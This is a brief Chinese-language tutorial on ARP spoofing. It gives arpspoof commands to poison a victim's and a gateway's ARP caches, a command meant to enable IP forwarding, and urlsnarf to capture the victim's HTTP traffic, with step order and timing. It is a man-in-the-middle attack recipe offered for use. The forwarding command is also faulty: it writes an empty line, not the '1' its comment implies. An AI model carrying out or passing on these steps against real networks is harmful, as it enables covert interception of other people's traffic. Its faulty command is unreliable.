arpspoof是Arp缓存中毒攻击,Arp嗅探的工具。常见的其他的也有Ettercap等。默认网卡eth0。也可以不指定。
# arpspoof -i eth0 -t victim gateway #欺骗目标主机以为我们是网关
# arpspoof -i eth0 -t gateway victim #在一个单独的shell里执行这个命令,欺骗网关相信目标主机
# echo > /proc/sys/net/ipv4/ip_forward #启动IP转发,使得目标主机可以通过你的主机连到网关,否则目标无法上网
然后可以用urlsnarf嗅探目标主机的http传输数据。tcp port 80 or port 8080 or port 3128。
urlsnarf -i eth0
先执行 bash0的,再执行bash1的命令。然后等个30s-1min欺骗成功,然后再执行bash2的嗅探http数据。